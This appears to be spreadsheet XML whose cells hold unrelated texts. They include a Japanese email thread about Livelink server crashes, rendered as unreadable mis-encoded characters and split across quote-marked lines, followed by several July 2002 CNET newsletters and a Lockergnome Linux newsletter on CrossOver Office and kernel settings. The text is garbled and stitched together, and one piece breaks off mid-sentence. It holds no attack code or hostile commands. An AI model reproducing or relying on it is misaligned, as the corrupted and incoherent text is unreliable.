&gt; &gt; ã‚¿ãƒ¼
&gt; &gt; &gt; &gt; ãƒ³ãŒ
&gt; &gt; &gt; &gt; &gt; &gt; ã‚ã‚Š
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Livelinkã®å‡¦ç†ã‚’å†åº¦è¡Œãªã£ã¦ã‚‚ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã«ãªã‚‹ã“ã¨
&gt; &gt; ã¯ãª
&gt; &gt; &gt; &gt; ã
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; é€”ä¸­ã§çµ‚äº†ã—ã¦ã„ã‚‹å‡¦ç†ãŒåŽŸå› ã§ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã«ãªã£ã¦ã„
&gt; &gt; ã‚‹ã“
&gt; &gt; &gt; &gt; ã¨ã¯
&gt; &gt; &gt; &gt; &gt; &gt; ãªã„
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã¨
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; æ€
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã„ã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ãŠé€ã‚Šã™ã‚‹ãƒ­ã‚°ã‹ã‚‰ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã®åŽŸå› ã¨è§£æ±ºæ–¹æ³•ã«ã¤ã„
&gt; &gt; ã¦ãŠ
&gt; &gt; &gt; &gt; çŸ¥ã‚‰
&gt; &gt; &gt; &gt; &gt; &gt; ã›ã
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã 
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã•
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã„ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã“ã‚Œã ã‘ã®ãƒ­ã‚°ã‚’ç¢ºèªã™ã‚‹ã«ã¯ã€æ™‚é–“ãŒã‹ã‹ã‚Šã¾ã™ã®ã§æœ€æ–°
&gt; &gt; (ï¼˜æœˆ
&gt; &gt; &gt; &gt; ï¼‘ï¼
&gt; &gt; &gt; &gt; &gt; &gt; æ—¥
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; )ã®
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ãƒ­
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã‚°ã‹ã‚‰ç¢ºèªã‚’ãŠé¡˜ã„ã„ãŸã—ã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ãªãŠã€ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜ã§ã¯ã€ãƒã‚§ãƒ³ã‚¸ã‚¨ãƒ¼ã‚¸ã‚§
&gt; &gt; ãƒ³ãƒˆ
&gt; &gt; &gt; &gt; å‡¦ç†
&gt; &gt; &gt; &gt; &gt; &gt; ã‚’åˆ¥
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Livelinkã‚µãƒ¼ãƒã«åˆ¥ã‘ã¦ãŠã‚Šã¾ã›ã‚“ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ç™ºç”Ÿæ—¥æ™‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010626 03:00
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010626 09:56
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010627 13:17  - connectãƒ­ã‚°ãŒå¤§ãã„ãŸã‚ã€connectãƒ­ã‚°
&gt; &gt; ä»¥å¤–
&gt; &gt; &gt; &gt; ã‚’
&gt; &gt; &gt; &gt; &gt; &gt; ftpã‚µã‚¤
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ãƒˆ
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã«
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã‚¢ãƒƒãƒ—ã—ã¾ã—ãŸã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010708 22:09
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010710 04:00
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010710 08:05
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010718 09:10
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010718 09:28
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010725 10:50
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010731 08:26
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010807 11:00  - connectãƒ­ã‚°ãŒå¤§ãã„ãŸã‚ã€connectãƒ­ã‚°
&gt; &gt; ä»¥å¤–
&gt; &gt; &gt; &gt; ã‚’
&gt; &gt; &gt; &gt; &gt; &gt; ftpã‚µã‚¤
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ãƒˆ
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã«
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã‚¢ãƒƒãƒ—ã—ã¾ã—ãŸã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010809 09:01
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010810 08:57
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã‚ˆã‚ã—ããŠé¡˜ã„ã„ãŸã—ã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã‚­ãƒ¤ãƒŽãƒ³è²©å£²ï¼ˆæ ªï¼‰
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ä¼Šè—¤ã€€æ­£ç¾©
</t>
  </si>
  <si>
    <t xml:space="preserve">
CNET Cell Phone Newsletter
Wireless
 			All CNET
 			The Web
			Â 
July 11, 2002Cell phones coming soon--updated
Siemens S46
Cell phone personality test--updated
Wireless Top 5sTop 5 AT&amp;T Wireless cell phones
Top 5 Sprint PCS phones
Top 5 Verizon Wireless cell phones
All Top 5s
Cell phones coming soon--updatedBefore you buy, see what products are on the horizon. We have pictures and release dates for upcoming models.Read the story Siemens S46The company's second mobile for the U.S. market picks up where the stylish S40 left off. Like that earlier model, this one's a world phone with business-centric features. How impressive is it?
Read the reviewCell phone personality test--updatedChoose among our five user profiles to find out what models best match your wireless persona. Take the test and see them all.
Match your profileLive tech help; submit your question now
CNET News.com: Top CIOs on the future of IT
Find a job you love, with more than 1 million postings
ZDNet: This IT director has had enough of Microsoft
May Editors' Choice award: Pioneer's home-theater system, the HTS-910DVThe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</si>
  <si>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Shopper Newsletter: AlertsLive tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoft July 11, 2002 
From Computers4SureFujifilm FinePix 30i just $245!
 From buy.com Great deals and free shipping!Computers4Sure
Fujifilm FinePix 30i  
								â€¢ 1,920,000 pixels 
â€¢ 2.5 x digital zoom
â€¢ MP3 player
								Â Â Just $299
Olympus Camedia D-40 Zoom
								â€¢ 4.0-megapixel, 1.8-in LCD monitor
								â€¢ 2.8x optical/2.5x digital zoom
								â€¢ Incl. 16MB SmartMedia card
								Â Â Just $599
Sony Cyber Shot DSC-F707
								â€¢ 5.0-megapixels, 1.8-in LCD
								â€¢ 5x optical/10x digital zoom
								â€¢ Incl. 16MB Memory Stick
							    Â Â Just $999
 buy.com
 Minolta Dimage X 
								â€¢ Free shipping â€¢ 2.1-megapixels, 1.5-in LCD
								â€¢ 3xoptical zoom, 2xdigital
								â€¢ Free shipping 
								Â Â Just $347
Fujifilm FinePix 2600 Zoom
								â€¢ Free shipping 
								â€¢ 2.1-megapixels, 1600x1200 res.
								â€¢ 3x optical/2.5x digital Zoom 
								Â Â Just $238Minolta Dimage F100
								â€¢ Free shipping
								â€¢ Super-fine 4-megapixel images 
								â€¢ Sleek, slim design
								Â Â Just $600
 The e-mail address for your subscription isÂ qqqqqqqqqq-zdnet@spamassassin.taint.org
UnsubscribeÂ |
Â Manage My Subscriptions
Â |Â FAQÂ |
Â Advertise        Copyright 2002 CNET Networks, Inc. All rights reserved.          .</t>
  </si>
  <si>
    <t xml:space="preserve">Message Boards DispatchMessages
 All CNET
 The Web
Â 
1. Wireless
2. Computer Help
3. Speakeasy
4. Windows 98
5. PC Hardware
6. Windows Me
7. Computer Newbies
8. Downloads
9. Windows XP
10.Virus &amp; Security
				Check out the User Opinions on these Hot Products and then submit one of your own.
				Â 92%Â Â 8%Â (3629 votes)
RAMBooster
In Downloads: Optimizers &amp; Diagnostics85%Â Â 15%Â (2878 votes)
ZoneAlarm
In Downloads: Security &amp; Encryption84%Â Â 16%Â (50 votes)
VirusMD Family Webfilter 1.0
In Downloads: Browsing CompanionsMore User OpinionsComputer Problems? Try our Live Support from a Live technician!	.black {color: #000000; font-family: Verdana, Arial, Helvetica, sans-serif; font-style: normal; font-size: 11px; font-weight: normal;}
&lt;!--
function clearTextarea() {
	if ((document.QuestionEntry.Question.value == "Type here and click go.")) {
		document.QuestionEntry.Question.value = "";
	} else {
		return;
	}
}
//--&gt;Type here and click go.July 11, 2002 Dear Readers,
With all the corporate scandals--such as WorldCom and Enron--surrounding us, who can you trust nowadays? Well, for starters, you can trust the CNET Message Boards. The CNET Message Boards are as real as it gets. When it comes down to giving or receiving honest tech advice, there's no better place to be. In the Boards there are no reviews or tests by professionals, just real, true-life experiences and discussions from people like you and me who share one common interest: the love of today's challenging technology. There are no sneaky execs here or scandals to worry about, so if you have a specific problem or question 
in mind, post it! You won't be disappointed. 
						Lee Koo
						CNET Community
						Got suggestions? Email me: messageboards@cnet.com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Why I don't use firewalls
Do you need some honest opinions? Despite all the horror stories that you hear of hackers and Trojans intruding on one's personal computer, hear why one of our veteran moderators refuses to use a firewall. This discussion gets a bit heated, but her point was well taken. Take a look and see why she refuses, and if you have a cent or two to throw in, the donation jar is wide open. More Security and Virus Alerts discussions
The scoop on USB 2.0
The chances are that the next time you pick up an external computer peripheral, it will be utilizing USB 2.0 to connect to your computer. So what is USB 2.0? Is it that much faster than USB 1.1? Will your current USB port be compatible with peripherals with the new version? Well if you have similar questions, I gathered up some discussion on this topic in hopes that it will bring a better understanding of what's in store for USB 2.0. Take your pick. USB vs. USB 2.O
How to upgrade from USB 1.1 to 2.0?
USB 2.0 with reverse compatibility with USB 1.1?
More Hardware discussionsWindows XP not any faster than Windows 98SE?!
Many users have jumped ship and moved on to newer and supposedly better things such as Windows XP, but what if it doesn't perform up to par and is actually slower than the previous OS that you had? Check out this discussion; what's newer may not always be faster. More Windows XP discussionsBest type of backup system to use for someone that is indigent?
Backing up your hard-drive system sounds like a task for veteran, but is it? In 
this discussion, a beginner is asking for sound advice on the best type of backup system to use, and sure enough, he received a bunch of options to choose from. If you're in that same boat and looking for the best ways to back up some of that important data of yours, this discussion is for you. Have a look. More Computer Newbies discussionsWarning for kids and teens online
If you're a parent, this may be something that you may want to read about kids online. I found it interesting enough to pass along because I know someday I'll be faced with the same worries when my kids are out surfing the web. So have a look, and if it doesn't interest you, pass it on to someone who may find it informative.  
XP and defragmenting
Can RAM be "worn out"?
WinModem vs. "full" modemMy PC won't wake up
from Jen Smith
Purchasing a CD-RW--what kind?
from Graham Hurst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</si>
  <si>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 xml:space="preserve">Copies, Webcasts tangled in draft bill Â Search
	                Â 
	                Â 
News.com
	                All CNETÂ Â Â Â 
	                The Web
                Â Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 11, 2002Copies, Webcasts tangled in draft bill Sharp's Zaurus PDA suffers security holesOutlook plug-in could let the hackers inACLU: Don't rat out your customersShareholders sue PayPal, eBayEllison: I don't need an understudyÂ Vision Series			Read News.com's exclusive interviews of 10 top CIOs.
Vision Series home
Copies, Webcasts tangled in draft bill Legislators are readying a bill that could sharply limit Americans' rights relating to copying music, taping TV shows, and transferring files through the Internet.
At the same time, the draft legislation seen by CNET News.com would place the struggling Webcasting industry on firmer legal footing.
July 11, 2002, 11:35 AM PT
 | Read Full Story Sharp's Zaurus PDA suffers security holesSharp's Linux-based, business-oriented Zaurus handheld suffers from security holes that could let hackers grab private data off a corporate network, according to researchers at Syracuse University.
In an advisory posted Wednesday to a Syracuse University computer-science Web site, researchers said they had found vulnerabilities in Sharp's Zaurus SL-5500 and Zaurus SL-5000D handhelds. The flaws let attackers take control of the device's file system, giving them the power to overwrite files or lock the device so no data can be input through the keypad or touch screen.
July 11, 2002, 12:50 PM PT
 | Read Full Story Outlook plug-in could let the hackers inA widely used plug-in for Microsoft's Outlook e-mail client that lets users encrypt and digitally sign messages has inadvertently weakened security and left the mail program open to attack.
Security company eEye Digital Security issued a warning late Wednesday to users of Network Associates' Pretty Good Privacy (PGP) plug-in for Outlook, saying that a vulnerability in the add-on could let attackers execute malicious software on a victim's computer. Network Associates released a patch for the problem Wednesday as well.
July 11, 2002, 11:05 AM PT | Read Full Story 
ACLU: Don't rat out your customersA clutch of civil liberties groups is asking small Internet service providers to get a backbone and stand up to companies seeking to unveil anonymous critics.
A group including the Electronic Frontier Foundation, the American Civil Liberties Union (ACLU), and the Center for Democracy and Technology is urging ISPs to alert customers when they are the targets of so-called John Doe legal actions, which try to unmask the identities of people who anonymously air their companies' dirty laundry. The group has sent letters to more than 100 ISPs, asking them to adopt a written policy promising to let customers know if they're targets.
July 11, 2002, 12:35 PM PT
 | Read Full Story Shareholders sue PayPal, eBayThe PayPal-eBay merger has hit an early snag: Two shareholder lawsuits have been filed against the companies seeking to block the deal.
The lawsuits, each filed in Delaware Chancery Court earlier this week on behalf of PayPal shareholders, charge that the deal represents a breach of the companies' fiduciary duty to those shareholders and that the price eBay is paying for PayPal is unfair and inadequate, the companies said in separate regulatory filings on Thursday.
July 11, 2002, 11:50 AM PT
 | Read Full Story Ellison: I don't need an understudyDeflecting continuing calls for a No. 2 executive, Oracle Chief Executive Larry Ellison said again Wednesday that the company does not need anyone to back him up.
Ellison, responding primarily to recent news stories that the company might need a second in command, said the current team is enough to guide Oracle.
July 10, 2002, 6:05 PM PT
 | Read Full Story 
From our partners:Meet Microsoft, home networkerBusiness Week
The Colossus of Redmond's next bold move is into routers that'll let consumers connect their digital devices together and to the Net.
July 11, 2002
 | Read Full Story Sprint: Not out, but windedBusiness Week
While it's hardly the next WorldCom, slowing wireless growth and red ink in long-distance are hardly fuel for its stock.July 11,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Tech hurdles ahead for e911
Correspondent Melissa Francis looks at the technology hurdles facing wireless carriers in launching the second phase of the e911 initiative by October.
 Watch Video
Â Â Enterprise'Father of Pentium' sets up India VC fundEMC lures HP exec to technology postJapan's major chipmakers join forcesE-BusinessStocks tumble to new lowsExpedia snubs parent company's bidEarnings alert: Yahoo back in blackCommunicationsKPN says it will unplug KPNQwest networkVerizon to ask NorthPoint claim get tossedWorldCom won't pay MCI shareholdersMediaLawmakers: Keep your tunes to yourselfMovielink: Bring on the expertsWeb users ante up for games, classmatesPersonal TechnologyTeen handheld maker wants to playRIM files second suit against GoodGamers invade Army Web site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</si>
  <si>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07.10.2002 Lockergnome Penguin ShellÂ  07.10.2002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today!I've just got a few quick thoughts today.First, the search is underway for the hosting solution mentioned in Monday's Penguin Shell. The response has been great, with more than two dozen offers of web space for the Foundation for Children and Youth With Diabetes. It gratifying to see our community rally around a great cause. Know that whether you answered the call or not, you're in the electronic company of some caring and compassionate folks. I've not yet heard whether a solution has been found from among the many offered, but I'll certainly keep you posted on the outcome.Second, a few final clarifications on the 4th of July bruhaha. A reader brought to my attention that, though he didn't believe it to be the case, offering my opinion on the state of America could be seen as trolling. That certainly wasn't intended. Also, I've seen much email over the past week that started with, "Since you published the opinion of someone outside the US, I'd expect that you'll publish an opinion in disagreement." Well, I did that already - it was my own opinion that started the discussion. I can clearly see the potential for this to get out of hand. So, this will be the last word on the subject. Thanks for your opinions and your discussion, the vast majority of which was well-thought and reasonable. Both sides were presented and we're moving on.On to some Lockergnome news. If you haven't already heard, 
CleverMedia is sponsoring karaoke night at Gnomedex. According to the woman with her finger on the pulse of Gnomedex, Lori Lockwood, "There is definitely a 'surprise' in the works for the attendees ... " Hmmm. Could it even compare to last year's Miss Gnomedex contest? I think it unlikely. In any regard, the folks at CleverMedia are certainly more than capable of coming up with loads of fun -- it's what they do for a living! Between Leo Laporte, Doc Searls, Steve Gibson, Mark Thompson, Evan Williams, and too many others to mention, you'd be silly to miss out.Onward. Have a great day.
Tony
Steidler-DennisonÂ Â Â Â Â Â Â Â GnomeTWEAK
Lockergnome readers, SAVE 50% on the Computing Encyclopedia!
Are you looking for the ultimate computing resource? Discover the
Computing Encyclopedia from Smart Computing.  Regular price $59,
SPECIAL OFFER for Lockergnome readers,
get your set TODAY, ONLY $29.95!Windows Apps in Linux? - Part III don't want to mince any words, here. CodeWeavers has really hit a sweet spot with their recently-released CrossOver Office product. This is, quite simply, the fulfillment of the promise of the Wine Project. Using this slick little app, virtually all the applications in the Microsoft Office suite are fully functional in Linux. Frankly, I never thought I'd see the day when running Windows apps in Linux was exciting. Maybe it's time to take up shucking ice cubes in the blasted lands.Let's break this product up a bit. If purchased as a bundle, both CrossOver Office and CrossOver Plugin (as we discussed yesterday) share an install script. They do, however, require separate install processes, so they need to be launched individually from a shared window.I started the CrossOver Office install, dropped my Office 2000 disc in the CD drive, and fired up the install. It looked and performed exactly as you'd expect to see it in Windows. I was able to customize the install, as I always have, then let it run. At the end of the process, CrossOver Office "fakes" a Windows reboot and the Office suite installation is complete.Even Internet Explorer 5.0 is installed. There's an option in the CrossOver Office package to install IE 5.5 but, to my chagrin, this was the one area of the install that failed. Actually, the install itself may have succeeded - I was just left without an IE browser following the upgrade. It's hard to tell whether that was a fault in CrossOver Office, or in the IE program itself.For the most part, these apps perform in Linux as they do in Windows. The IE install was a bit kludgy, with some font problems and an inability to customize the toolbar. Word worked perfectly, allowing me even to pull together legal documents for a friend's business without so much as a hiccup. Even printing works well with the installation of a "Wine Postscript Printer" driver.Let me reiterate something I said yesterday. I've watched the Wine Project walk, then crawl, then walk again over the past few years. I've always suspected that the fits and starts were not for lack of talent. With the financial backing of CodeWeavers, it appears that my suspicions were well founded. Wine has, through CrossOver Office and CrossOver Plugin, matured to a level of useability that should easily attract Linux users throughout the spectrum of experience. In the big picture, widespread acceptance of these products could remove the last remaining roadblock for many current Windows users to make the leap to Linux: the loss of Word and Excel. They simply don't need to fear those losses any more.A note on the "for pay" structure of these products seems in order. As you well know, I'm an open source guy through and through. But, this is clearly a case in which the "free" efforts of talented and dedicated developers simply wasn't enough to close the gap. The value of these products easily outweighs their minimal cost. And, if it keeps these developers moving forward, it seems to be the perfect pay model for Linux.
Recommend It!
Send us a GnomeTWEAKÂ GnomeCORE
Kernel Configuration - Part XToday we're looking into the mysteries of Plug and Play support in your Linux kernel configuration.There's really not much mystery to it. This section simply asks the question, "Do you want plug and play support in the kernel?" In other words, do you have all the PCI and ISA devices in your system that you'll ever need to have? If you're set solid with your current machine, there's no use to add the overhead of PnP to your system's kernel code, or as a loadable module. If, on the other hand, you've got PCI or (on an older system) ISA slots just begging to be filled, build this support into the kernel or select it as modules.See, this kernel gig isn't really so tough. In fairness, we're hitting the high points without a heady discussion of the hidden workings. The discussion of PnP alone could comprise a full series in Penguin Shell. But, so far, the configuration has been pretty straightforward.Tomorrow, we will dive a bit deeper, with a discussion of block device kernel configuration.
Recommend It!
Send us a GnomeCORE tipÂ GnomeFILE
LiquidWarhttp://www.ufoot.org/liquidwar/"Liquid War is a truly original multiplayer wargame. You control an army formed with thousands of pixels (fighters) which look like liquid and try to eat your opponent. You can play against a primitive NPC/AI or up to 5 other human players. Network play is available."
Recommend It!
Send us a GnomeFILE suggestionÂ GnomeVOICE
Gnome 2 Installation Notes
Scribbled by Dale Hirt"As always, am loving the newsletter.  I've been getting it since day one,
and I love all the stuff that you have put in it."Just a quick word about the Gnome2 installation.  At least so far in my
installation wonders, I have noticed that you need to install intltool (#15)
before scrollkeeper (#3), as it is required in order to build.Thanks again for a great newsletter."
Recommend It!
Speak your GnomeVOICEÂ GnomeCLICK
Linmodems.org
http://www.linmodems.org/Linmodems.org is a full-featured site on modem hardware and setup in Linux. This has always been a point of friction with Linux users - finding that the machine you've just coverted doesn't have a Linux-compatible modem, or finding modem configuration to be too difficult. Linmodems.org takes on both these issues with skill and ease. The site includes discussion on hardware, software and chipsets. It also links to sites to walk you through the process of setting up a winmodem in Linux. This is a great resource of your main connection to the e-universe is via a dialup connection.
Recommend It!
Suggest a GnomeCLICKhttp://www.lockergnome.com/issues/penguinshell/07.10.2002.html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Win a Digital Camera
Â General Feedback
Â Chris's Blog
Â E-mail the Editor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
</t>
  </si>
  <si>
    <t>CNET Investor Dispatch
Quote LookupEnter symbol:Â· Symbol Lookup
Quotes delayed 20+ minutes
â€¢ My Portfolio
â€¢ Broker Reports
â€¢ IPOs
â€¢ Splits
â€¢ Messages
Â 
MRAE
3.9
27.87%
Â 
LEXG
5.15
27.16%
Â 
BNHNA
14.95
24.63%
Â 
AETH
3.48
22.97%
Â 
GGUY
3.1
21.57%
Â 
GDYS
6.951
-32.78%
Â 
APHT
4.07
-26.67%
Â 
AUTN
2.3
-26.52%
Â 
MHCO
2.74
-21.71%
Â 
PMFG
9.5
-21.22%
Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 11, 2002 DJIA8801.53 Â -11.97
 NASDAQ1374.43 Â 28.42
 S&amp;P 500927.37 Â 6.90
 CNETÂ TECH995.16 Â 29.87CNET News.com Vision SeriesRead News.com's exclusive interviews of 10 top CIOs.Vision Series home
Battered stocks regain ground
Led by a surge in chip titan Intel, beaten-down technology shares rose Thursday.Despite a Merrill Lynch downgrade of Yahoo to "reduce/sell", the Internet portal rose after posting better-than-expected second-quarter results and also helped lift the sector. CNET's Tech index gained 29.87 points, or 3.11 percent, to close at 995.16. The tech-laden Nasdaq composite index tacked on 28.42 points, or 2.11 percent, to close at 1,374.43--after hitting a five-year low Wednesday.Broader markets were mixed amid news wholesale prices rose slightly and drug firm Bristol-Myers Squibb is being probed by the Securities and Exchange Commission. The Dow Jones industrial average fell 12.0 points, or 0.14 percent, to close at 8,801.5. The S&amp;P 500 added 6.9 points, or 0.75 percent, to close at 927.37, after it too reached a five-year low Wednesday.
With rebates, HP angles for PC sales 
Hewlett-Packard is trying to beat the heat with summer deals on PCs.
For retail buyers in the United States, the company is offering several new rebate or promotional programs, designed to stimulate demand for its PCs, going into the back-to-school shopping season. Some of the deals include a new $200 mail-in rebate on desktops, while others offer instant $50 rebates.HEWLETT-PACKARD CO 15.23 -0.13% Shareholders sue PayPal, eBay 
The PayPal-eBay merger has hit an early snag: Two shareholder lawsuits have been filed against the companies seeking to block the deal.
The lawsuits, each filed in Delaware Chancery Court earlier this week on behalf of PayPal shareholders, charge that the deal represents a breach of the companies' fiduciary duty to those shareholders and that the price eBay is paying for PayPal is unfair and inadequate, the companies said in separate regulatory filings on Thursday.EBAY INC 60.38 2.63% SAP cuts forecast, shows Q2 loss 
Europe's biggest software maker, SAP AG, shocked the market on Thursday by unexpectedly cutting its sales forecast and missing analysts' forecast for the second quarter.The company said it would post a net loss of 235 million euros ($232 million) and said it was taking a non-recurring accounting charge of 414 million euros to cover impairments of minority investments in the United States, including a 318 million euros charge from its 20 percent stake in Commerce One.SAP AKTIENGESELLSCHAFT ADS 19.70 -7.73% 
Also from CNET
Real-time stock quotes from CNET News.com Investor.30-day free trial!
Merrill Lynch downgrades Yahoo in report 7/11/02 
Analysts Justin Baldauf and Tim Gernitis cut their intermediate-term rating on the Internet giant from "neutral" to "reduce/sell" and their long-term rating from "strong buy" to "neutral" after seeing Yahoo's second-quarter results. Although the results look solid at first, Baldauf and Gernitis say Yahoo's growth was driven entirely by new initiatives. They also argue the firm's improved outlook seems driven completely by the Overture deal extension. Eventually, these initiatives will result in much lower growth rates, the analysts say. They argue Yahoo's stock price isn't supported by the firm's fundamentals.YAHOO INC 12.92 5.99% 
Visit the Brokerage Center
EMC lures HP exec to technology post 
EMC has hired Mark Lewis away from Hewlett-Packard to become chief technology officer and vice president of new ventures, the high-end storage specialist said Thursday.
Lewis had been head of Compaq Computer's high-end storage division, then became head of worldwide storage marketing after the company's $19 billion merger with HP. He replaces Jim Rothnie, who is retiring and becoming CTO emeritus.EMC CORP 8.15 4.49% 
Visit the CEO Wealth MeterDigicams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</si>
  <si>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
Digital Dispatch Weekly NewsletterAll CNET
 The Web
Â 
Apple to expand iMac LCD display
It ain't heavy; it's my laptop
Gateway touts chic yet cheap PCs
Apple's iPod comes to Linux
Dell PCs coming to a mall near youMore CNET NewsQuintessential Player 3.4AI Picture Utility 6.2.1ICQ 2002a Build #3728Deck 3.5 (for the Mac)Dell Latitude C510/C610 seriesÂ 
In HardwareToshiba Pocket PC e310 
In ElectronicsAutoCAD LT 2002 
In SoftwareSony Ericsson T68 
In Wireless
 July 11, 2002						--Janice Chen,						editor in chief,						CNET Reviews
 Dear readers,It was a crushing blow to discover that Vindigo, my
all-time-favorite Palm app, was no longer free. Twenty-five bucks
wasn't steep, but the principle of paying for a former freebie
was hard to swallow. Not that hard, though; surprising
myself--and my fellow cheapskates--I've discovered that I'd
rather dish out the dough than go Vindigo-free myself.That's what Web-based e-mail providers are banking on. Now that
most of us have gotten sucked in by those gratis Web e-mail
accounts, most "free" Web e-mailers have started charging for
premium services or imposing strict limitations on free accounts.
Read our reviews 
of the four top services to see what you get if
you dish out the dough (or not)--and which to avoid if you want
to stay spam-free.Surfacing on this week's Buzz Meter is another free-gone-fee app.
The latest version of the popular file-sharing software BearShare
now offers a paid version that lets you search and download
without those annoying ads. Maybe the best things in life are now
those with a fee. 
WorldCom woes continueNext-generation MP3 playersThese three hard drive-based MP3 players turn last year's models into paperweights.
	â€¢ Mojo rising: TDK's new MP3 CD player
	â€¢ The Nomad Jukebox 3 breaks new groundMost popular
MP3 &amp; audio
	1. Creative Labs Nomad Jukebox 3
	2. iRiver SlimX iMP-350
	3. Sonicblue Rio Volt SP250
	4. Sonicblue Rio Riot
	5. Archos Jukebox Recorder
 See all most popular
CNET reviews four no-cost Web e-mailers
Yahoo now charges for services that were once free; Hotmail
   dumps accounts without so much as an explanation. So-called
   free Web-based e-mailers aren't quite as free-wheelin' as they
   once were. Are the savings worth the hassle? We take another
   look at "free" e-mailers.
More softwareIBM's thin ThinkPads fit to a T
The ThinkPad T-series notebooks are fast, and they offer a
   great design, innovative features, and good support. For a
   comprehensive look at this line of notebooks, check out our
   verdict.
More notebooksRead the reviewÂ |Â 
   Check latest pricesMP3 player personality test
These days, there are almost as many types of MP3 player as
   there are types of MP3 listener.  That's why it can be a
   daunting task to winnow through what's available to find your
   perfect match.  Take our MP3 player personality test to find
   out which one suits you best.
More portable audio
Gifts for grads: home entertainment  Fixing up that first apartment can be a trying time for a
   young grad. Make it easy by throwing in some home-theater
   equipment along with the congratulations. Combining a DVD
   player with a solid speaker system, the Onkyo HTS-L5 is the
   perfect all-in-one-device. Also on tap: portable DVD players,
   the best TiVo player we found, and a 27-inch HD-ready TV set
   that's perfect for the smart set.
More in Tech Trends
Peachtree Complete Accounting 2003
For years, Peachtree has provided professional accounting to
   small businesses. As a result, Peachtree Complete 2003 has all
   the basics, including inventory control, time billing, and
   payroll management. And Peachtree even contains a wide array
   of Web tools for creating and maintaining an online store.
   What's new in 2003?
More softwareSiemens S46
The company's second mobile for the U.S. market picks up where
   the stylish S40 left off. Like that earlier model, this one's
   a world phone with business-centric features. How impressive
   is it?
More in wireless phonesÂ WorldCom woes continue
WorldCom woes dominate, BearShare 4.0 isn't what it used to be,
and Jaguar runs ahead of schedule.--Laura Lindhe, executive editor, CNET Tech Trends
1
WorldCom:
I hate to put it first, but unfortunately, all other
   tech trends are overshadowed by this scandal. Now entering its
   fourth week as front-page news, WorldCom woes continue to sap
   investor confidence. This week's big story: the top execs from
   the company are standing silent against government accusations
   of wrongdoing.
2
BearShare 4.0:
This new version of the well-known peer-to-peer
   software was been completely redesigned and comes in two
   flavors: free with ads and paid without ads. This is nice
   touch, but unfortunately, 4.0 fails in one key area:
